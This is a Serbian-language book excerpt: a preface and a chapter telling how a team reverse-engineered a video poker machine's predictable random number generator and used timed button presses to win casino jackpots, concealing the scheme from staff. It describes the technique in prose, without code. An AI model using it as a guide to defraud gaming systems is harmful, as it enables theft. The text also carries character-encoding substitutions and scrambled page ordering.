Umece provale

Predgovor Hakeri – klinci i oni ne tako mladi – neprestano se nadmeñu meœu sobom. Svakako bi se “proslavio” onaj ko bi se mogao pohvaliti upadom u Web prezentaciju moje kompanije za bezbednost, ili u moj liåni sistem. Zadovoàstvo bi im priåinilo i ako bi uspeli da izmisle priåu o upadu u neki sistem i predstave je meni i koautoru ove kçige, Bilu Sajmonu, tako uveràivo da nas ona ponese, da poverujemo u çu i ukàuåimo je u kçigu. To je pred nas dvojicu postavilo fascinirajuñi izazov, borbu umova koja se odvijala svaki put kada smo vodili razgovore za ovu kçigu. Veñina novinara i pisaca lako utvrœuje autentiånost izjave. Da li je osoba s kojom razgovaraju zaista osoba za koju se predstavàa? Da li ta osoba jeste ili je bila na poloæaju koji navodi? Da li ta osoba radi ili je radila za navedenu organizaciju? Da li ta osoba ima dokumenta kojima bi potkrepila priåu, i moæe li se utvrditi da su ta dokumenta vaàana? Postoje li pouzdani àudi koji ñe podræati priåu ili neke çene delove? Ali, iskrenost hakera malo je teæe proveriti. Veñina àudi åije se priåe nalaze u ovoj kçizi, osim nekoliko çih koji su veñ bili u zatvoru, bili bi sudski goçeni ako bi çihov pravi identitet bio utvrœen. Zbog toga je malo verovatno da ñe vam oni otkriti svoja prava imena kao dokaz. Ispriåali su mi svoje priåe samo zato ãto mi veruju. Znaju da sam bio u zatvoru, i oslaçaju se na to da ih neñu izdati i dovesti u situaciju u kojoj sam i sâm bio. Uprkos rizicima, mnogi od çih su ponudili opipàive dokaze svojih upada. Naravno, moguñe je – zapravo, verovatno je – da su neki i preuveliåali svoje “uspehe”, dodajuñi priåama detaàe koji ih åine zanimàivijim, ili da su razvili potpuno izmiãàene priåe, ali su ih zasnovali na ostvarivim podvizima, tako da zvuåe istinito. Zbog tih rizika, åvrsto smo se pridræavali visokih standarda pouzdanosti. U svim razgovorima ispitivao sam svaki tehniåki detaà, traæio detaàna objaãçeça svega ãto nije zvuåalo verodostojno, a ponekad sam se

ix

Umeñe provale

x

kasnije vrañao na istu priåu da bih video da li je i daàe ista, ili ñe sagovornik neãto izmeniti. Sumçu su budile osobe koje “nisu mogle da se sete” kako su izvele neki teæak korak i izostavile ga iz priåe. Takoœe, nisam verovao osobama koje nisu izgledale kao da znaju dovoàno da bi uradile ono ãto tvrde da jesu, ili nisu mogle da objasne kako su stigle od taåke A do taåke B. Osim tamo gde je izriåito navedeno drugaåije, sve glavne priåe u ovoj kçizi poloæile su moj test verovatnoñe. Bil i ja smo se sloæili oko uveràivosti svake osobe åija je priåa ukàuåena u kçigu. Meœutim, detaàe smo åesto meçali da bismo zaãtitili i hakera i ærtvu. U isto vreme, poãto kompanije koje prave softver i hardver stalno otklaçaçu bezbednosne propuste pomoñu zakrpa i novih verzija proizvoda, samo joã neki podvizi opisani u kçizi i daàe imaju isti efekat. Previãe samopouzdan åitalac mogao bi pomisliti da nema o åemu da brine – poãto ñe nedostaci biti otkloçeni ili veñ jesu, on ili çegova kompanija nemaju åega da se plaãe. Meœutim, lekcija koju treba da nauåite iz ovih priåa jeste da hakeri pronalaze nove slabosti svaki dan. Proåitajte kçigu – ne da biste saznali pojedinaåne nedostatke pojedinaånih proizvoda, veñ da biste promenili svoje stavove i postali odluåniji. Proåitajte je i da biste se zabavili, i poåeli da boàe shvatate iznenaœujuñe podvige ovih opasno veãtih hakera. Neke priåe su ãokantne, neke ñe vam otvoriti oåi, a u nekima ñete se nasmejati inspiraciji i drskosti hakera. Ukoliko se bavite informacionim tehnologijama ili bezbednoãñu, iz svake priåe saznañete kako da svoju organizaciju uåinite sigurnijom. Ako niste tehniåki nastrojeni, ali volite kriminalistiåke priåe, pune drskosti, rizika i hrabrosti, sve to ñete pronañi u ovoj kçizi. Svaka opisana avantura suoåava se sa opasnoãñu nailaska na vrata iza kojih, sa spremnim lisicama, åeka åitava potera policajaca, FBI agenata i tipova iz tajne sluæbe. U mnogim sluåajevima, upravo to se i desilo. Za one ostale, ta moguñnost i daàe postoji. Nije ni åudo ãto neki od ovih hakera nikada ranije nisu hteli da ispriåaju svoje avanture. Veñina onih o kojima ñete åitati u ovoj kçizi objavàena je po prvi put.

Poglavlje 1 Hakerisanjem kazina do milion dolara Kad god [neki programer] kaæe: “Niko se neñe muåiti oko toga”, naœe se klinac u Finskoj raspoloæen da se pomuåi. – Aleks Mejfild

U

æivotu svakog kockara doœe magiåan trenutak kad jednostavna uzbuœeça prerastu u 3D fantazije – momenat kada pohlepa proguta etiku, a sistem kazina postane samo joã jedna planina koja åeka da bude osvojena. U tom trenutku, maãtaçe o proverenom naåinu da se pobede stolovi ili maãine oduzima dah. Aleks Mejfild i çegova tri druga nisu samo saçarili. Kao i mnogi drugi upadi, i ovaj je poåeo kao veæba inteligencije, provera da li je neãto moguñe. Na kraju, çih åetvorica su pobedili sistem i olakãali kazina za “oko milion dolara”, priåa Aleks. Ranih devedesetih, åetiri prijateàa su radila kao savetnici za visoke tehnologije i æiveli opuãteno i nonãalantno. “Znate veñ – radite, zaradite neke pare, a onda ne radite dok ne ostanete ãvorc.” Las Vegas je bio daleko – dekor za snimaçe filmova i TV serija. Upravo zato, kada je firma za razvoj tehnologije ponudila momcima zadatak da naprave softver i isprate ga na tamoãçu konvenciju o visokoj tehnologiji, oni su ponudu oberuåke prihvatili. To bi im bila prva poseta Vegasu, ãansa da i sami vide bàeãtava svetla, i to s plañenim troãkovima. Ko bi to odbio? Zasebni apartmani u velikom hotelu znaåili su da zabavi mogu da se pridruæe i Aleksova supruga i Majkova devojka. Dva para, plus Lari i Marko, otisnuli su se put vrelog Grada greha.

1

Aleks kaæe da nisu znali mnogo o kockaçu niti o tome ãta da oåekuju. “Izaœete iz aviona, a svuda oko vas starije gospoœe igraju na slot maãinama. Sve to izgleda smeãno i ironiåno, i uvuåe vam se u svaku poru.” Poãto su zavrãili posao na sajmu, åetiri prijateàa i dve dame otiãli su u kazino u svom hotelu, igrali na slot maãinama i uæivali u besplatnim pivima, kada je Aleksova supruga pred çih postavila izazov.

Zar ove maãine nisu zasnovane na raåunarima? Momci, vi se time bavite, zar ne moæete da uåinite neãto da bismo osvojili viãe novca? Umeñe provale

2

Drugari su se preselili u Majkov apartman i poåeli da izbacuju pitaça i postavàaju teorije o naåinu na koji aparati rade.

Istraæivaçe To je bio okidaå. “Sve to nas je zainteresovalo i, po povratku kuñi, poåeli smo da ispitujemo stvar”, priåa Aleks, oæivàavajuñi señaça na kreativnu fazu. Vrlo brzo, istraæivaçe je podræalo ono ãto su veñ pretpostavàali. “Da, to su u osnovi raåunarski programi. Zanimalo nas je postoji li naåin da provalimo te maãine?” Neki àudi su pobedili slot maãine tako ãto su “zamenili firmver” – u maãinu bi ubacili kompjuterski åip i program zamenili drugim koji bi omoguñio atraktivnije isplate nego ãto je kazino predvideo. Mada su drugi timovi to radili, åinilo se da takva akcija zahteva dogovor s radnikom kazina, i to ne sa bilo kojim radnikom, veñ s tehniåarem zaduæenim za slot maãine. Za Aleksa i çegove ortake “zameçivaçe ROM-ova bilo je kao tresnuti baku po glavi i oteti joj taãnu”. Zakàuåili su da bi se u sve to upuãtali samo ako bi cela akcija bila izazov za çihove programerske veãtine i intelekt. Povrh svega, oni nisu bili naroåito talentovani za laæno predstavàaçe (engl. social egineering). Bavili su se raåunarima, ali nisu znali kako da priœu zaposlenom u kazinu i predloæe da im se pridruæi u maçoj prevari kojom ñe uzeti neãto tuœeg novca. Ali kako ñe reãiti problem? Aleks je objasnio:

Pitali smo se da li bismo mogli predvideti sekvencu karata. Ili, da li moæda postoje zadça vrata [programski kôd koji omoguñava kasniji neovlaãñen pristup programu], koja je neki programer napravio radi sopstvene koristi. Sve programe su pisali

programeri, a oni su vragolasti stvorovi. Pomislili smo da bismo mogli nabasati na zadça vrata, na primer tako ãto ñemo pritisnuti odreœenu sekvencu dugmadi i tako promeniti verovatnoñu dobitka, ili sami programirati pukotinu koju bismo mogli da iskoristimo.

3 Poglavlje 1: Hakerisanjem kazina do milion dolara

Aleks je proåitao kçigu The Eudaemonic Pie Tomasa Basa (Thomas Bass) (Penguin, 1992), priåu o grupi momaka koji su se bavili raåunarima i fizikom. Oni su osamdesetih pobedili rulet u Las Vegasu koristeñi sopstvenu verziju “prenosivog” raåunara, veliåine pakle cigareta, koji je predviœao rezultat na ruletu. Jedan ålan tima za stolom pritiskao je dugmad unoseñi brzinu toåka ruleta i naåin rotiraça kuglice. Raåunar je radio-talasima prenosio tonove u sluãni aparat drugog ålana tima koji je tumaåio signal i kladio se na odgovarajuñi broj. Oåekivali biste da su odneli tonu novca, ali nisu. Po Aleksovom miãàeçu, “Njihova ãema je imala ogroman potencijal, ali je bila sputana nezgrapnom i nepouzdanom tehnologijom. Takoœe, bilo je previãe uåesnika, pa su problem predstavàali i ponaãaçe i meœusobni odnosi. Mi smo reãili da ne ponovimo çihove greãke.” Aleks je zakàuåio da bi bilo lakãe pobediti igru zasnovanu na raåunaru “jer su raåunari potpuno predvidivi” – rezultat zavisi od onoga ãto se prethodno desilo, ili, da parafraziramo staru izreku vezanu za laæno predstavàaçe, ubaciã dobre podatke, dobijeã dobre podatke. (Originalan izraz na ovo gleda iz negativne perspektive: “ubaciã œubre, dobijeã œubre”.) To mu je savrãeno odgovaralo. Kao mladiñ, Aleks je bio muziåar, svirao je u kultnom bendu i saçao o tome da postane rok zvezda, a kada to nije uspelo, prebacio se na prouåavaçe matematike. Imao je talenta za matematiku i, mada nikada nije mario za ãkole (napustio je koledæ), nastavio je da se bavi tom temom sve dok nije stekao solidan nivo znaça. Poãto je zakàuåio da je istraæivaçe neophodno, otputovao je u Vaãington i proveo neko vreme prouåavajuñi dokumentaciju u zavodu za patente. “Pomislio sam da je neko moæda bio dovoàno glup da sav kôd ubaci u patent” za videopoker aparat. I naravno, bio je u pravu. “U to vreme, strpati gomilu objektnog koda u patent bio je naåin da podnosilac patenta zaãtiti svoj izum, jer kôd sadræi detaàan opis izuma, ali u obliku koji nije naroåito razumàiv korisnicima. Uzeo sam mikrofilm sa

Umeñe provale

4

objektnim kodom i pregledao strane pune heksadecimalnih brojeva traæeñi zanimàive odeàke, koji su morali biti pretvoreni [u upotrebàiv oblik]”. Analiziraçe koda otkrilo je nekoliko tajni koje su zaintrigirale tim, ali su zakàuåili da se, ukoliko bi da odmaknu daàe, moraju doåepati konkretne maãine koju hoñe da hakeriãu, i sami pogledaju kôd. Njih åetvorica su åinili dobro usklaœen tim. Majk je bio viãe nego kompetentan programer, i znao je viãe o hardveru nego ostala trojica. Marko, joã jedan bistar programer, bio je emigrant iz Istoåne Evrope tinejdæerskog izgleda. Ali, bio je priliåno smeo pametçakoviñ koji je svemu prilazio sa stavom “mogu ja to”. Aleks je bio odliåan programer i doprineo je svojim poznavaçem ãifrovaça. Lari nije bio naroåito dobar programer, a zbog udesa s motorom nije mogao mnogo da putuje. Meœutim, on je bio odliåan organizator koji je usmeravao projekat i vodio raåuna da se svi fokusiraju na ono ãto u odreœenoj fazi treba obaviti. Posle poåetnih istraæivaça, Aleks je “zaboravio” na projekat. Ali Marko se zagrejao za ideju. Nastavio je da insistira: “Nije to nikakav problem, maãine se mogu legalno kupiti u trinaest dræava”. Na kraju je uspeo da ubedi ostale da pokuãaju. “Pomislili smo, ãto da ne.” Uspeli su da izdvoje dovoàno novca za put i kupovaçe maãine. Ponovo su se uputili u Vegas – ovaj put o svom troãku i s drugim ciàem na pameti. Aleks priåa: “Da biste kupili slot maãinu, trebalo je samo da uœete u radçu i pokaæete liånu ispravu iz dræave u kojoj takvu maãinu moæete legalno posedovati. Ukoliko ste imali vozaåku dozvolu iz neke od tih dræava, niko vas nije previãe ispitivao.” Jedan od çih je imao zgodnu vezu sa stanovnikom dræave Nevada. “Bio je to ujak neåije devojke, ili tako neãto, i on je æiveo u Vegasu.” Odluåili su da Majk razgovara s tim åovekom jer “ima dræaçe trgovca i vrlo je reprezentativan tip. Pretpostavàa se da ñete maãinu koristiti za nelegalno kockaçe. Isto kao sa oruæjem”, Aleks je objasnio. Mnogo maãina je dospevalo na “sivo træiãte” – prodavano je van dozvoàenih kanala klubovima i sliånim mestima. Ipak, iznenadilo ga je ãto su mogli da kupe “potpuno isti aparat kao ãto su oni u kazinu”. Majk je åoveku dao 1.500 dolara za maãinu japanske proizvodçe. “Onda smo nas dvojica utovarili prokletiçu u kola. Vozili smo kuñi kao da na zadçem sediãtu imamo bebu.”

Razvijaçe upada Majk, Aleks i Marko su odteglili aparat uz stepenice, na drugi sprat kuñe u kojoj su mogli da koriste slobodnu spavañu sobu. Ovo iskustvo je Aleks dugo pamtio kao jedno od najveñih uzbuœeça u svom æivotu.

Aparat koji je Aleks odabrao koristio se veñ desetak godina. Kad god kazino hoñe da kupi maãinu novog dizajna, Komisija za kockaçe (Las Vegas Gaming Commission) mora da prouåi program i pobrine se da on bude takav da isplate igraåima budu poãtene. Odobravaçe novog dizajna moæe potrajati, pa kazina zadræavaju stare aparate duæe nego ãto biste oåekivali. Åinilo se da ñe starija maãina verovatno sadræati prevaziœenu tehnologiju i tim se nadao da ñe je lakãe napasti. Raåunarski kôd koji su preuzeli sa åipa bio je u binarnom obliku – niz jedinica i nula koje predstavàaju osnovni nivo kompjuterskih uputstava. Da bi ih preveli u oblik s kojim bi mogli da rade, prvo su morali da se pozabave reverznim inæeçeringom (engl. reverse engineering) – procesom kojim inæeçer ili programer utvrœuje kako je postojeñi proizvod projektovan. U ovom primeru, to je znaåilo prevoœeçe jezika maãine u kôd koji su momci mogli da razumeju i s kojim su mogli da rade. Aleksu je trebao “disasembler” za prevoœeçe koda. Åetvorka nije htela da izazove sumçu kupovinom programa – to bi bilo kao da su otiãli u biblioteku i pozajmili kçige o pravàeçu bombe. Sami su napisali disasembler, a Aleks taj posao opisuje kao “ne baã prost ko pasuà, ali zabavan i relativno lak”. Poãto su kôd iz poker aparata propustili kroz novi disasembler, tri programera su sela i poåela da prolivaju znoj nad çim. Viåan projektant softvera obiåno brzo pronalazi delove programa na koje hoñe da se


Otvorili smo je, izvadili ROM i utvrdili koji je to procesor. Ja sam odluåio da uzmemo japansku maãinu koja je izgledala kao imitacija jedne poznate marke. Pomislio sam da su inæeçeri moæda bili pod veñim pritiskom, pa su bili leçi ili malo nemarniji. Ispostavilo se da sam bio u pravu. Koristili su [åip] 6809, sliåan åipu 6502 koji ste mogli nañi u raåunaru Apple II ili Atari. Bio je to 8-bitni åip s memorijom od 64K. Poãto sam programirao na asemblerskim jezicima, bio mi je poznat.

Umeñe provale

6

usredsredi. To je zato ãto osoba koja piãe kôd svud po çemu ostavàa saobrañajne znake – napomene, komentare i primedbe koji objaãçavaju funkciju svakog dela koda, sliåno kao ãto kçiga ima naslove delova, poglavàa, i podnaslove odeàaka unutar poglavàa. Kada se program prevede u oblik koji maãina moæe da proåita, ti saobrañajni znaci se ignoriãu – raåunaru ili mikroprocesoru oni ne trebaju. Zbog toga, kodu dobijenom ovakvom analizom nedostaju ta korisna objaãçeça. Da se opet posluæimo metaforom “saobrañajnih znakova” – ovako dobijen kôd liåi na mapu bez imena mesta, bez oznaka autoputeva ili ulica. Pregledali su strane koda na ekranu traæeñi odgovore na osnovna pitaça: “Koja logika je primeçena? Kako se karte meãaju? Kako se biraju karte za zamenu?” Ipak, u tom trenutku najvaænije im je bilo da pronaœu kôd “generatora sluåajnih brojeva” (engl. random number generator). Aleks je ispravno pretpostavio da su japanski programeri koristili preåice koje su ostavile greãke u kodu generatora sluåajnih brojeva. Zaista su ih koristili.

Ponovno pisaçe koda Aleks ponosno opisuje svoj trud. “Bili smo programeri i bili smo dobri u onome ãto smo radili. Shvatili smo kako se brojevi u kodu pretvaraju u karte na maãini i napisali smo kôd na jeziku C koji ñe raditi isto”, ispriåao je.

Imali smo motivaciju i non-stop smo radili. Mislim da nam je trebalo dve ili tri nedeàe da doœemo do taåke kada smo zaista znali ãta se deãava u kodu. Pogledaã kôd, pretpostaviã åemu sluæi, napiãeã nov kôd, baciã ga na ROM [raåunarski åip], vratiã u aparat i gledaã ãta se deãava. Pisali smo rutine koje na ekranu preko karata ispisuju heksadecimalne brojeve. Tako smo dobili neku vrstu pregleda naåina na koji kôd deli karte. Bila je to kombinacija pokuãaja i greãaka i dubinske analize. Kôd je vrlo brzo poåeo da poprima smisao. Gotovo precizno smo shvatili kako se brojevi u raåunaru pretvaraju u karte na ekranu.

Nadali smo se da je generator sluåajnih brojeva bio relativno jednostavan. A ranih devedesetih bio je upravo takav. Malo sam istraæivao i otkrio da je zasnovan na neåemu ãto je Donald Knut napisao joã ãezdesetih. Ti tipovi nisu niãta izmislili, samo su iskoristili postojeñe istraæivaçe metoda iz Monte Karla i sliånih stvari, i ubacili ga u svoj kôd. Otkrili smo taåan algoritam koji su koristili za generisaçe karata. Zove se linearni pomiåni registar sa povratnom vezom (engl. linear feedback shift register, LFSR) i priliåno je dobar generator sluåajnih brojeva.

Ukoliko bi brojevi zaista bili nasumiåni, ne biste mogli podesiti kvote. Ne bi mogli da se procene izgledi. Neki aparati uzastopno daju fleã rojale. A oni ne bi trebali uopãte da se pojavàuju. Zbog toga projektanti æele moguñnost provere ispravnosti statistike, inaåe imaju oseñaj da ne kontroliãu igru. Druga stvar koju projektanti nisu shvatili kada su napravili ovaj aparat, jeste to da im ne treba samo generator sluåajnih brojeva. Statistiåki u svakom deàeçu ima deset karata – pet koje se vide na poåetku, i po jedna zamena za svaku od poåetnih karata koja ñe se pojaviti ukoliko igraå odluåi da je odbaci. Ispostavilo se da su rane verzije aparata tih deset karata uzimale iz deset sekvencijalnih nasumiånih brojeva u generatoru sluåajnih brojeva. Tako su Aleks i çegovi partneri shvatili da su programske instrukcije ovih starijih maãina loãe smiãàene. A zbog tih greãaka videli su da mogu napisati relativno jednostavan, ali elegantan i domiãàat algoritam kojim ñe pobediti maãinu.

Poglavlje 1: Hakerisanjem kazina do milion dolara

Meœutim, uskoro su otkrili da ovaj generator ima fatalnu greãku koja im je mnogo olakãala posao. Majk je objasnio da je to bio “relativno jednostavan 32-bitni generator sluåajnih brojeva, pa je bilo moguñe dostiñi sloæenost izraåunavaça potrebnu za çegovo provaàivaçe, a uz nekoliko dobrih optimizacija stvar je postala gotovo trivijalna”. Znaåi, dobijeni brojevi nisu bili zaista nasumiåni. Aleks smatra da postoji dobar razlog zaãto je moralo biti tako.

7

Aleks je primetio da je trik u tome da poånete igru, vidite koje su karte prikazane na maãini, i unesete podatke za identifikovaçe tih karata u raåunar kod kuñe. Algoritam ñe izraåunati gde je generator sluåajnih brojeva bio i kroz koliko brojeva treba da proœe pre nego ãto bude spreman da prikaæe æeàene karte – fleã rojal.

Seli smo za naã aparat, pokrenuli svoj programåiñ i on nam je taåno rekao koja ñe biti sledeña sekvenca karata. Bili smo priliåno uzbuœeni.

Umeñe provale

8

To uzbuœeçe Aleks je pripisao oseñaçu “da ste pametniji od nekoga i znate da ga moæete pobediti. A to ñe, u naãem sluåaju, doneti i novac”. Otiãli su u kupovinu i pronaãli ruåni sat marke Casio s funkcijom odbrojavaça koja se moæe podesiti na desetine sekunde. Kupili su tri sata, po jedan za svakog ålana koji ñe iñi u kazina. Lari ñe ostati u bazi i odræavati raåunar. Bili su spremni za testiraçe metode. Jedan ålan tima bi poåeo da igra i javio bi koje je karte dobio – broj i boju svih pet karata. Lari bi uneo podatke u çihov raåunar. Mada je çegova marka bila maçe poznata, bio je to popularan raåunar kod zaluœenika i odliåan izbor za ovu namenu, jer je imao mnogo bræi åip od onog u japanskom poker aparatu. Trebalo mu je samo nekoliko trenutaka da izraåuna taåno vreme za odbrojavaçe koje treba podesiti na Casio satu. Kada se sat oglasi, igraå na slot maãini treba da pritisne dugme Play. Ali, to je morao uraditi u deliñu sekunde. Aleks objaãaçava da to i nije bio toliko veliki problem kako se moæda åini.

Nas dvojica smo neko vreme bili muziåari. Kada ste muziåar i imate dovoàno oseñaja za ritam, moæete pritisnuti dugme s kaãçeçem maçim od pet milisekundi. Ukoliko sve bude radilo kao ãto je planirano, aparat ñe prikazati traæeni fleã rojal. Veæbali su na svom aparatu dok svi nisu uspeli da otvore fleã rojal nakon prihvatàivog broja pokuãaja. U prethodnim mesecima, po Majkovoj priåi, oni su “izdvojili programski kôd aparata, precizno utvrdili kako se sluåajni brojevi pretvaraju u karte na ekranu, taåno odredili kada i koliko brzo generator

sluåajnih brojeva pravi petàu, nauåili sve bitne specifiånosti maãine i razvili program koji ñe sve te promenàive uzimati u obzir. Kada vam je poznato staçe pojedinaåne maãine u odreœenom trenutku, s visokom preciznoãñu moæete predvideti ponavàaçe sluåajnih brojeva u bilo kom trenutku u sledeñih nekoliko sati, pa åak i dana”. Pobedili su maãinu – pretvorili je u svog roba. Prihvatili su intelektualni izazov koji je upad postavio i pobedili su. Znaçe je moglo da ih uåini bogataãima. Bilo je lepo saçariti o tome. Ali, da li su zaista mogli da izvedu akciju u dæungli kazina?

Jedna je stvar privatno petàati oko svog aparata, na bezbednoj lokaciji. Sesti usred prepunog kazina i ukrasti novac – to je potpuno druga priåa. Za to su potrebni åeliåni æivci. Njihove dame su mislile da putuju samo radi zabave. Momci su ih ohrabrili da obuku uske sukçice i upadàivo se ponaãaju – kockaju se, priåaju, kikoñu, naruåuju piña – nadajuñi se da ñe àudi iz obezbeœeça koji upravàaju kamerama biti ometeni lepim licima i oblinama. “Zato smo insistirali na tome ãto smo viãe mogli”, seña se Aleks. Nadali su se da ñe se uklopiti, stopiti s masom. “Majk je bio najboài. Bio je proñelav, i on i çegova supruga su izgledali kao tipiåni igraåi.” Aleks opisuje scenu kao da se sve desilo juåe. Marko i Majk su akciju opisali malo drugaåije, ali evo kako je sve izgledalo Aleksu. Sa svojom suprugom Eni prvo je obiãao kazino i odabrao jedan video poker aparat. Morao je s velikom preciznoãñu znati taåan ciklus maãine. Jedna metoda koju su koristili bila je da video kameru stave u torbicu. U kazinu bi igraå postavo torbicu tako da objektiv kamere bude usmeren na ekran poker aparata i dræao je neko vreme ukàuåenu. “Bilo je nezgodno”, seña se, “postaviti torbu na odgovarajuñe mesto, a pri tom ne izgledati kao da je poloæaj torbe bitan. Prosto, ne æelite da uradite niãta ãto bi delovalo sumçivo i privlaåilo paæçu.” Majk je viãe voleo drugu metodu, koja je bila maçe zahtevna: “Ciklus ponavàaça brojeva na nepoznatom aparatu izraåunavali smo pomoñu dva oåitavaça karata sa ekrana, u razmaku od viãe sati.” Morao je biti siguran da na maãini u meœuvremenu niko nije igrao jer bi se time promenila brzina ponavàaça, ali to je bilo lako:


Povratak u kazina – ovaj put radi igre

9

Umeñe provale

10

samo je trebalo da proveri da li su na ekranu prikazane karte koje je ostavio kada je posledçi put igrao na maãini, a to je obiåno bio sluåaj jer se na “maãinama s visokim ulozima ne igra åesto”. Nakon drugog uåitavaça prikazanih karata, podesio bi odbrojavaçe na Casio satu, a potom bi telefonom javio Lariju podatke o vremenu i sekvencama karata. Lari bi ih uneo u çihov raåunar i pokrenuo program. Na osnovu tih podataka, raåunar bi predvideo vreme sledeñeg fleã rojala. “Nadate se da ñe se to desiti u roku od nekoliko sati, ali ponekad je trebalo da proœe nekoliko dana”, pa bi u tom sluåaju pokuãali s drugim aparatom, åesto u drugom hotelu. Podeãeno vreme na Casio satu moglo bi biti promaãeno i za oko minut, ali ipak je bilo dovoàno precizno. Aleks i Eni su se u kazino vrañali dosta ranije u sluåaju da je neko seo za aparat koji oni æele, i igrali na drugim aparatima dok çihov ne bude slobodan. Aleks bi seo za ciàni aparat, a Eni za aparat do çega. Poåeli bi da igraju i trudili se da izgledaju kao da se zabavàaju. A onda:

Ja bih poåeo da igram, podeãavajuñi tajmer na ruånom satu. Zapamtio bih podeàene karte – vrednost i boju svih pet karata, a potom nastavio da igram sve dok ne zapamtim osam karata u sekvenci. Klimnuo bih svojoj æeni kao znak da odlazim i krenuo ka zakloçenijoj javnoj govornici izvan dvorane kazina. Imao sam oko osam minuta da odem do telefona, obavim ãta sam morao i vratim se za aparat. Moja æena je nastavàala da igra. Ukoliko bi neko hteo da koristi moj aparat, ona bi mu rekla da tu sedi çen suprug. Smislili smo naåin da pozovemo Larijev broj pejdæera i da preko brojeva na tastaturi telefona unesemo karte. Tako nismo morali da izgovaramo oznake karata – àudi iz kazina uvek osluãkuju takve stvari. Lari bi ponovo uneo karte u raåunar i pokrenuo program. Potom bih ga pozvao. On bi sluãalicu dræao iznad raåunara koji bi dao dva kratka zvuåna signala. Kada bih åuo prvi zvuk, pritisnuo bih pauzu na brojaåu sata i zaustavio odbrojavaçe. Kada bih åuo drugi zvuk, ponovo bih pritisnuo pauzu da bih restartovao brojaå.

Karte koje je Aleks javàao govorile su raåunaru taåan poloæaj na kom je bio generator sluåajnih brojeva poker aparata. Unoãeçem kaãçeça koje je odredio raåunar, Aleks je unosio kàuånu ispravku u brojaå svog Casio sata tako da se on oglasi taåno u trenutku kada ñe se pojaviti fleã rojal.

Kada je prvi put osvojio novac, Aleks je bio “veoma uzbuœen, ali uplaãen. Nadzornik stolova je bio neki namrgoœeni Italijan. Bio sam siguran da me åudno gleda, sa zbuçenim izrazom lica, moæda zato ãto sam stalno telefonirao. Mislim da je otiãao da presluãa trake.” Uprkos napetosti, imalo je to “svojih åari”. Majk se priseña: “Naravno, bio sam nervozan jer je neko mogao da primeti moje sumçivo ponaãaçe, ali zapravo, niko me nije åudno gledao. Mene i moju suprugu tretirali su kao i druge dobitnike visokih uloga – åestitali su nam i davali poklone.” Bili su toliko uspeãni da su morali voditi raåuna o tome da ne osvoje previãe novca i ne privuku paæçu na sebe. Suoåili su se s retkim problemom prevelikog uspeha. “Sve je bilo vrlo javno. Osvajali smo ogromne dæek potove u desetinama hiàada dolara. Fleã rojal ima kvotu 4000 prema 1. Na aparatu u koji se ubacuje 5 dolara, to je dvadeset hiàada.” Cifre su i veñe. Neke igre su progresivne – glavni zgoditak raste sve dok ga neko ne osvoji, a ovi momci su mogli i çih lako da dobiju.

Osvojio sam jedan koji mi je doneo 45 hiàada. Priãao mi je tehniåar sa ãirokim pojasom – on verovatno i popravàa maãine. Taj åovek ima poseban kàuå koji nemaju àudi ãto rade u dvorani. Otvori kuñiãte, izvadi [elektronsku] ploåu, izvadi ROM åip pred vama. Sa sobom nosi åitaå ROM-a i testira åip iz maãine poredeñi ga sa zlatnim masterom koji se åuva pod kàuåem.


Poãto bih restartovao brojaå sata, vrañao sam se aparatu. Kada bi se brojaå oglasio sa “bip, bip, bum” – baã tada, u trenutku tog “bum”, ponovo bih pritisnuo dugme Play na aparatu. U tom prvom pokuãaju mislim da sam osvojio 35.000 dolara. Doãli smo do oko 30 ili 40 procenata uspeãnosti jer je sve bilo dobro razraœeno. Nismo uspevali samo kada bismo uneli pogreãno vreme.

Umeñe provale

12

Aleks je saznao da je provera ROM-a standardna procedura veñ viãe godina. Pretpostavàa da su ih “dosad dosta ispaàivali”, pa su najzad otkrili kako da izvedu proveru ROM-a kao protivmeru. Aleksova izjava me je navela da se zapitam da li kazina obavàaju ove provere jer su neki tipovi koje sam sreo u zatvoru zameçivali firmver. Pitao sam se kako su to mogli tako brzo da obave i izbegnu otkrivaçe. Aleks smatra da je tajna u laænom predstavàaçu – sigurno su se dogovorili sa obezbeœeçem i potplatili nekog u kazinu. On je pretpostavàao da su moæda zamenili i zlatni master s kojim se poredi åip iz aparata. Aleks ostaje pri tome da je lepota upada koji je obavio çegov tim bila je u tome ãto nisu morali da meçaju firmver. A smatrali su da je çihov pristup bio i mnogo veñi izazov. Tim nije smeo da nastavi da osvaja toliko novca. “Bilo je jasno da ñe neko sabrati dva i dva i reñi: ’Ovog tipa sam veñ negde video‘. Uplaãili smo se da ñe nas uhvatiti.” Pored stalno prisutnih briga da ñe biti uhvañeni, morali su se pozabaviti i pitaçem poreza. Za svaki dobitak preko 1.200 dolara, kazino traæi liåna dokumenta i isplatu prijavàuje poreskoj sluæbi. Majk kaæe: “Pretpostavàali smo da ñe, ukoliko igraå ne dâ liånu kartu, porez biti odbijen od dobitka, ali nismo hteli da privlaåimo paæçu otkrivajuñi da li je ta pretpostavka taåna.” Plañaçe poreza “nije bilo veliki problem”, ali “ono ostavàa podatke koji govore da osvajate nenormalne koliåine novca. Zbog toga se mnogo planiraça odnosilo na pronalaæeçe naåina da ostanemo u potaji.” Morali su da smisle drugaåiji pristup. Nakon krañeg vremena telefoniraça kuñi, rodila se nova ideja.

Nov pristup Ovaj put momci su imali dva ciàa: razvijaçe metode koja bi im omoguñila da otvore ful, kentu ili pet karata iste boje, tako da isplate ne budu homogene i ne privlaåe paæçu. Drugi cià je da cela akcija bude maçe oåigledna i maçe dosadna od stalnog tråkaraça do telefona pre svake igre. Poãto je u kazinima postojao ograniåen broj japanskih aparata, momci su se ovaj put ustremili na ameriåku maãinu koja se viãe koristi. Rastavili su je na isti naåin i otkrili da je proces generisaça sluåajnih

Da su projektanti paæàivije proåitali neke kçige o sistemima ãifrovaça, ne bi napravili ovu greãku. Takoœe, trebalo je da budu metodiåniji prilikom testiraça sistema da bi ga razbili onako kako smo ga mi razbili. Svaki student koji je diplomirao raåunarske nauke verovatno bi mogao da napiãe kôd koji bi radio ono ãto smo mi pokuãavali da uradimo, åim biste mu rekli ãta se traæi. Najãkakàiviji deo odnosio se na pronalaæeçe algoritama koji bi brzo obavili pretragu i u roku od nekoliko sekundi rekli ãta se deãava. Ako biste to naivno uradili, pronalaæeçe reãeça moglo bi trajati nekoliko sati. Mi smo priliåno dobri programeri, i svi i daàe zaraœujemo od tog posla, pa smo doãli do nekih vrlo maãtovitih optimizacija. Ipak, ne bih to nazvao trivijalnostima. Señam se sliåne greãke koju je napravio programer kompanije Norton (pre nego ãto ga je Symantec kupio) radeñi na çihovom proizvodu Diskreet, programu koji je korisniku omoguñavao da pravi ãifrovane virtuelne 